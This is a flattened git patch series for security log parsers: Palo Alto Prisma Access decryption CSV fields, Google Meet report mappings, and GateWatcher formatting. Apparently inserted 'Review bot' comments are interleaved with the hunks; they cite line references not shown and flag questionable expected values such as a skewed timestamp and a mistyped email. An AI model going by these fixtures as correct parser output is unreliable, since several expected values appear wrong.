+ - ConfigVersion
+ - GenerateTime
+ - SourceAddress
+ - DestinationAddress
+ - NATSourceIP
+ - NATDestinationIP
+ - Rule
+ - SourceUser
+ - DestinationUser
+ - Application
+ - VirtualLocation
+ - SourceZone
+ - DestinationZone
+ - InboundInterface
+ - OutboundInterface
+ - LogAction
+ - TimeLogged
+ - SessionID
+ - RepeatCount
+ - SourcePort
+ - DestinationPort
+ - NATSourcePort
+ - NATDestinationPort
+ - Flags
+ - IPProtocol
+ - Action
+ - Tunnel
+ - FUTURE_USE
+ - FUTURE_USE
+ - SourceVMUUID
+ - DestinationVMUUID
+ - UUIDforrule
+ - StageforClienttoFirewall
+ - StageforFirewalltoServer
+ - TLSVersion
+ - TLSKeyExchange
+ - TLSEncryptionAlgorithm
+ - TLS_AUTH
+ - PolicyName
+ - EllipticCurve
+ - ErrorIndex
+ - RootStatus
+ - ChainStatus
+ - ProxyType
+ - CertificateSerialNumber
+ - Fingerprint
+ - CertificateStartDate
+ - CertificateEndDate
+ - CertificateVersion
+ - CertificateSize
+ - CommonNameLength
+ - IssuerCommonNameLength
+ - RootCommonNameLength
+ - SNILength
+ - CertificateFlags
+ - SubjectCommonName
+ - IssuerSubjectCommonName
+ - RootSubjectCommonName
+ - ServerNameIndication
+ - Error
+ - ContainerID
+ - PODNamespace
+ - PODName
+ - SourceExternalDynamicList
+ - DestinationExternalDynamicList
+ - SourceDynamicAddressGroup
+ - DestinationDynamicAddressGroup
+ - HighResTimestamp
+ - SourceDeviceCategory
+ - SourceDeviceProfile
+ - SourceDeviceModel
+ - SourceDeviceVendor
+ - SourceDeviceOSFamily
+ - SourceDeviceOSVersion
+ - SourceHostname
+ - SourceMACAddress
+ - DestinationDeviceCategory
+ - DestinationDeviceProfile
+ - DestinationDeviceModel
+ - DestinationDeviceVendor
+ - DestinationDeviceOSFamily
+ - DestinationDeviceOSVersion
+ - DestinationHostname
+ - DestinationMACAddress
+ - SequenceNumber
+ - ActionFlags
+ - DGHierarchyLevel1
+ - DGHierarchyLevel2
+ - DGHierarchyLevel3
+ - DGHierarchyLevel4
+ - VirtualSystemName
+ - DeviceName
+ - VirtualSystemID
+ - ApplicationSubcategory
+ - ApplicationCategory
+ - ApplicationTechnology
+ - ApplicationRisk
+ - ApplicationCharacteristic
+ - ApplicationContainer
+ - ApplicationSaaS
+ - ApplicationSanctionedState
+ - ClusterName
+ delimiter: ","
+
 - name: parsed_timestamp
 external:
 name: date.parse
diff --git a/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json
new file mode 100644
index 000000000..8a060536e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prisma-access/tests/test_decryption_csv.json
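Review bot: The new column list names the TLS authentication column `TLS_AUTH`, which breaks the CamelCase used by every other entry and differs from the `TLSAuth` key the JSON dialect carries for the same value (L604); naming it `TLSAuth` would let the `tls.cipher` template in the earlier parser hunk read a single key for both input formats. `FUTURE_USE` also appears twice; presumably the second occurrence overwrites the first in the parsed mapping, which is harmless today but deserves a comment such as `# two reserved columns, both discarded` so nobody later reads a value out of it. The `parsed_timestamp` stage that follows this block starts outside the hunk.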
@@ -0,0 +1,98 @@ +{ + "input": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto Prisma access", + "dialect_uuid": "ea265b9d-fb48-4e92-9c26-dcfbf937b630" + } + } + }, + "expected": { + "message": "1,2024/11/03 19:09:43,111111111111,DECRYPTION,0,2562,2024/11/03 19:09:43,1.2.3.4,5.6.7.8,4.3.2.1,8.7.6.5,URL Filtering - Chrome Profile,jdoe,,ssl,vsys1,VPN-SSL,INTERNET,tunnel.16,ae2.1111,Forward-Syslog,2024/11/03 19:09:43,2020391,1,55107,443,22814,443,0x400400,tcp,allow,N/A,,,,,25185364-4f1b-46b5-a376-a96a9438d665,Unknown,Unknown,TLS1.3,ECDHE,AES_256_GCM,SHA384,NoDecrypt-rule,,None,uninspected,Uninspected,No Decrypt,,,,,V1,0,0,0,0,0,:::::NONE,,,,,,,,,,,,,2024-11-03T19:09:43.654+01:00,,,,,,,,,,,,,,,,,1111111111111111111,0x8000000000000000,53,0,0,0,,NFW-OUT-DCA,1,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no\n", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "decryption", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-11-03T19:09:43Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "0" + }, + "destination": { + "address": "5.6.7.8", + "ip": 
"5.6.7.8", + "nat": { + "ip": "8.7.6.5", + "port": 443 + }, + "port": 443 + }, + "log": { + "hostname": "NFW-OUT-DCA", + "logger": "decryption" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "NFW-OUT-DCA", + "product": "PAN-OS", + "serial_number": "111111111111" + }, + "paloalto": { + "DGHierarchyLevel1": "53", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "0", + "VirtualLocation": "vsys1", + "VirtualSystemID": "1", + "tls": { + "chain_status": "Uninspected", + "root_status": "uninspected" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "4.3.2.1", + "5.6.7.8", + "8.7.6.5" + ], + "user": [ + "jdoe" + ] + }, + "rule": { + "name": "URL Filtering - Chrome Profile" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "4.3.2.1", + "port": 22814 + }, + "port": 55107, + "user": { + "name": "jdoe" + } + }, + "tls": { + "version": "1.3" + }, + "user": { + "name": "jdoe" + } + } +} \ No newline at end of file From 652c3ba67b29328a991970be1b7ea34412123e40 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:33:29 +0100 Subject: [PATCH 085/150] Google Report: add source.ip and user.email --- Google Cloud/google-report/ingest/parser.yml | 2 + .../google-report/tests/test_end_call.json | 59 +++++++++++++++++++ .../tests/test_end_call_no_ip.json | 44 ++++++++++++++ .../tests/test_meet_sample1.json | 9 ++- 4 files changed, 113 insertions(+), 1 deletion(-) create mode 100644 Google Cloud/google-report/tests/test_end_call.json create mode 100644 Google Cloud/google-report/tests/test_end_call_no_ip.json diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index 4213a66c9..a52024ed9 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml 
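Review bot: The expected `@timestamp` of `2024-11-03T19:09:43Z` treats the CSV `GenerateTime` (`2024/11/03 19:09:43`) as UTC, yet the same record's `HighResTimestamp` is `2024-11-03T19:09:43.654+01:00`, so the event is pinned one hour late; the HIPMATCH fixture for this intake at L600 resolves the equivalent pair to `2024-11-03T17:50:04.310000Z` from its `+01:00` high-resolution value. The `parsed_timestamp` stage is outside the hunk, so it is unclear whether the DECRYPTION branch simply bypasses that handling; if the high-resolution column is the intended source, as for HIPMATCH, the expected value should be `"@timestamp": "2024-11-03T18:09:43.654000Z"`. A one-hour skew silently misorders this dataset against the others in timelines and correlation windows.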
@@ -161,6 +161,8 @@ stages:
 network.transport: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "network_transport_protocol" %}{{param.value}}{% endif %}{% endfor %}'
 google.report.meet.code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "meeting_code" %}{{param.value}}{% endif %}{% endfor %}'
+ user.email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}'
+ source.ip: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "ip_address" %}{{param.value}}{% endif %}{% endfor %}'
 set_groups_enterprise_fields:
 actions:
diff --git a/Google Cloud/google-report/tests/test_end_call.json b/Google Cloud/google-report/tests/test_end_call.json
new file mode 100644
index 000000000..21a51a926
--- /dev/null
+++ b/Google Cloud/google-report/tests/test_end_call.json
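Review bot: `user.email` is filled from the `organizer_email` parameter, which is a different identity from the actor that the rest of `user.*` describes; the fixture change at L623 shows the effect, where `user.email` becomes `joe.done@test.com` while `user.name` stays `jone.doe` and `user.domain` stays `test.com`. For `call_ended` the actor can be `HANGOUTS_EXTERNAL_OR_ANONYMOUS` (L614, L619), so the organizer is routinely not the participant the event is about, and rules or investigations keyed on `user.email` would attribute a participant's session to the organizer. Keep `user.email` for the actor and carry the organizer in a vendor field beside the meeting code, e.g. `google.report.meet.organizer_email: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "organizer_email" %}{{param.value}}{% endif %}{% endfor %}'`, with a matching `_meta/fields.yml` entry. The `source.ip` line is fine as written; an absent parameter yields an empty string that is dropped, as the `test_end_call_no_ip` fixture shows by having no `source` object in its expected output.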
@@ -0,0 +1,59 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Pari
s\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T12:07:37.366Z\",\"uniqueQualifier\":\"-3853857772415670247\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/t2tqco4M6QzgpdeZHhmJy_6yJUU\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"173\"},{\"name\":\"screencast_recv_bitrate_kbps_mean\",\"intValue\":\"61\"},{\"name\":\"location_country\",\"value\":\"FR\"},{\"name\":\"identifier_type\",\"value\":\"device_id\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"0\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"2\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_QGKxiQcCZvF\"},{\"name\":\"device_type\",\"value\":\"meet_hardware\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"screencast_recv_long_side_median_pixels\",\"intValue\":\"1568\"},{\"name\":\"calendar_event_id\",\"value\":\"3ckjqg60dq5j4eu9cgjtdb396c\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"screencast_recv_fps_mean\",\"intValue\":\"29\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"33\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"74\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"udp\"},{\"name\":\"duration_seconds\",\"intValue\":\"15317\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"19\"},{\"name\":\"identifier\",\"value\":\"644e7990-c69d-4e09-8cd2-6ae52406c21c\"},{\"name\":\"location_region\",\"value\":\"Paris\"},{\"name\":\"audio_recv_packet_loss_max\",
\"intValue\":\"0\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"2\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"screencast_recv_short_side_median_pixels\",\"intValue\":\"980\"},{\"name\":\"is_external\",\"boolValue\":false},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"ip_address\",\"value\":\"1.2.3.4\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"15316\"},{\"name\":\"display_name\",\"value\":\"OLYMPUS (Paris-106T, 8)\"},{\"name\":\"screencast_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"0\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"8\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"320\"},{\"name\":\"screencast_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"conference_id\",\"value\":\"rJ7fsV2IE2eFwTlTZ88tDxIQOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"14874\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"7\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"180\"},{\"name\":\"meeting_code\",\"value\":\"ABCDEFGHIJ\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T12:07:37.366000Z", + "client": { + "geo": { + "country_iso_code": "FR", + "region_name": "Paris" + } + }, + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "ABCDEFGHIJ" + } + } + }, + "network": { + "application": "meet", + "transport": "udp" + }, + "related": { + "ip": [ + "1.2.3.4" + ] + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file 
diff --git a/Google Cloud/google-report/tests/test_end_call_no_ip.json b/Google Cloud/google-report/tests/test_end_call_no_ip.json new file mode 100644 index 000000000..de33d47c4 --- /dev/null +++ b/Google Cloud/google-report/tests/test_end_call_no_ip.json 
@@ -0,0 +1,44 @@ +{ + "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\"
:\"98\"},{\"name\":\"organizer_email\",\"value\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + } + }, + "expected": { + "message": 
"{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-14T11:32:12.301Z\",\"uniqueQualifier\":\"-6765941919309710661\",\"applicationName\":\"meet\",\"customerId\":\"C030x4pai\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ/kViPYXKeNuJj3LiW54AIt7GLiR4\\\"\",\"actor\":{\"callerType\":\"KEY\",\"key\":\"HANGOUTS_EXTERNAL_OR_ANONYMOUS\"},\"events\":[{\"type\":\"call\",\"name\":\"call_ended\",\"parameters\":[{\"name\":\"video_send_seconds\",\"intValue\":\"725\"},{\"name\":\"audio_send_bitrate_kbps_mean\",\"intValue\":\"13\"},{\"name\":\"video_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"endpoint_id\",\"value\":\"boq_hlane_UJtqXZcvBo3\"},{\"name\":\"device_type\",\"value\":\"web\"},{\"name\":\"video_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"video_recv_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"calendar_event_id\",\"value\":\"6cm94j8lp55a9880oj2o0rb3e6\"},{\"name\":\"screencast_send_seconds\",\"intValue\":\"0\"},{\"name\":\"video_send_fps_mean\",\"intValue\":\"30\"},{\"name\":\"audio_send_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"video_recv_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_send_jitter_msec_mean\",\"intValue\":\"1\"},{\"name\":\"audio_recv_seconds\",\"intValue\":\"3647\"},{\"name\":\"network_congestion\",\"intValue\":\"0\"},{\"name\":\"network_estimated_download_kbps_mean\",\"intValue\":\"1158\"},{\"name\":\"audio_send_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_transport_protocol\",\"value\":\"tcp\"},{\"name\":\"duration_seconds\",\"intValue\":\"3651\"},{\"name\":\"video_send_bitrate_kbps_mean\",\"intValue\":\"375\"},{\"name\":\"audio_recv_packet_loss_max\",\"intValue\":\"9\"},{\"name\":\"video_recv_fps_mean\",\"intValue\":\"23\"},{\"name\":\"audio_recv_packet_loss_mean\",\"intValue\":\"0\"},{\"name\":\"network_recv_jitter_msec_max\",\"intValue\":\"98\"},{\"name\":\"organizer_email\",\"value
\":\"tt.test@test.fr\"},{\"name\":\"is_external\",\"boolValue\":true},{\"name\":\"network_recv_jitter_msec_mean\",\"intValue\":\"3\"},{\"name\":\"audio_send_seconds\",\"intValue\":\"3647\"},{\"name\":\"display_name\",\"value\":\"Yuki\"},{\"name\":\"video_recv_seconds\",\"intValue\":\"3638\"},{\"name\":\"network_rtt_msec_mean\",\"intValue\":\"11\"},{\"name\":\"video_send_long_side_median_pixels\",\"intValue\":\"480\"},{\"name\":\"conference_id\",\"value\":\"aSABpyKZtlKN_wqM98PaDxIXOAIIigIgABgDCA\"},{\"name\":\"screencast_recv_seconds\",\"intValue\":\"3627\"},{\"name\":\"product_type\",\"value\":\"meet\"},{\"name\":\"network_estimated_upload_kbps_mean\",\"intValue\":\"105\"},{\"name\":\"video_send_short_side_median_pixels\",\"intValue\":\"270\"},{\"name\":\"video_recv_packet_loss_max\",\"intValue\":\"0\"},{\"name\":\"meeting_code\",\"value\":\"BUSOHGFTVB\"}]}]}", + "event": { + "action": "call_ended", + "category": [ + "session" + ], + "dataset": "admin#reports#activity", + "type": [ + "connection" + ] + }, + "@timestamp": "2024-11-14T11:32:12.301000Z", + "cloud": { + "account": { + "id": "C030x4pai" + } + }, + "google": { + "report": { + "meet": { + "code": "BUSOHGFTVB" + } + } + }, + "network": { + "application": "meet", + "transport": "tcp" + }, + "user": { + "email": "tt.test@test.fr" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_meet_sample1.json b/Google Cloud/google-report/tests/test_meet_sample1.json index 406a0943c..fd7b1fa66 100644 --- a/Google Cloud/google-report/tests/test_meet_sample1.json +++ b/Google Cloud/google-report/tests/test_meet_sample1.json 
@@ -41,13 +41,20 @@
 "transport": "udp"
 },
 "related": {
+ "ip": [
+ "5555:333:333:5555:5555:5555:5555:5555"
+ ],
 "user": [
 "jone.doe"
 ]
 },
+ "source": {
+ "address": "5555:333:333:5555:5555:5555:5555:5555",
+ "ip": "5555:333:333:5555:5555:5555:5555:5555"
+ },
 "user": {
 "domain": "test.com",
- "email": "jone.doe@test.com",
+ "email": "joe.done@test.com",
 "id": "1098488062555",
 "name": "jone.doe"
 }
From 74e459dd00f628dc287820ee60efef6fb61789ab Mon Sep 17 00:00:00 2001
From: LenaigKaliou
Date: Fri, 22 Nov 2024 10:39:44 +0100
Subject: [PATCH 086/150] Prettier on another parser to pass tests
---
 GateWatcher/aioniq/ingest/parser.yml | 18 +++++++++---------
 1 file changed, 9 insertions(+), 9 deletions(-)
diff --git a/GateWatcher/aioniq/ingest/parser.yml b/GateWatcher/aioniq/ingest/parser.yml
index 3cc13d747..20c57feb0 100644
--- a/GateWatcher/aioniq/ingest/parser.yml
+++ b/GateWatcher/aioniq/ingest/parser.yml
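Review bot: The expected `user.email` now reads `joe.done@test.com` while `user.name`, `related.user` and the unchanged `user.domain` still describe the same principal as `jone.doe` / `test.com`, so the fixture pins an address whose local part no longer matches the user name. If the input message at the top of the fixture (outside this hunk) was not changed the same way, the parser cannot produce this expected value and the test will fail; if it was, the name fields would presumably have to follow. Worth confirming which of the two was intended before this expected value is committed.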
@@ -206,12 +206,12 @@ stages: tls: actions: - set: - tls.server.issuer: "{{json_load.message.tls.issuerdn}}" - tls.server.not_before: "{{json_load.message.tls.notbefore}}" - tls.server.certificate_chain: "{{json_load.message.tls.chain}}" - tls.server.subject: "{{json_load.message.tls.subject}}" - gatewatcher.tls: "{{json_load.message.tls}}" - gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" - gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" - tls.version: "{{json_load.message.tls.version}}" - tls.server.not_after: "{{json_load.message.tls.notafter}}" + tls.server.issuer: "{{json_load.message.tls.issuerdn}}" + tls.server.not_before: "{{json_load.message.tls.notbefore}}" + tls.server.certificate_chain: "{{json_load.message.tls.chain}}" + tls.server.subject: "{{json_load.message.tls.subject}}" + gatewatcher.tls: "{{json_load.message.tls}}" + gatewatcher.tls_sni: "{{json_load.message.tls.sni}}" + gatewatcher.tls_fingerprint: "{{json_load.message.tls.fingerprint}}" + tls.version: "{{json_load.message.tls.version}}" + tls.server.not_after: "{{json_load.message.tls.notafter}}" From ba631f3d23a2724a148dea4093f6010b3d176331 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Fri, 22 Nov 2024 10:41:05 +0100 Subject: [PATCH 087/150] fix on linting --- GateWatcher/aioniq/_meta/fields.yml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/GateWatcher/aioniq/_meta/fields.yml b/GateWatcher/aioniq/_meta/fields.yml index 07bae26e7..8bc01d294 100644 --- a/GateWatcher/aioniq/_meta/fields.yml +++ b/GateWatcher/aioniq/_meta/fields.yml 
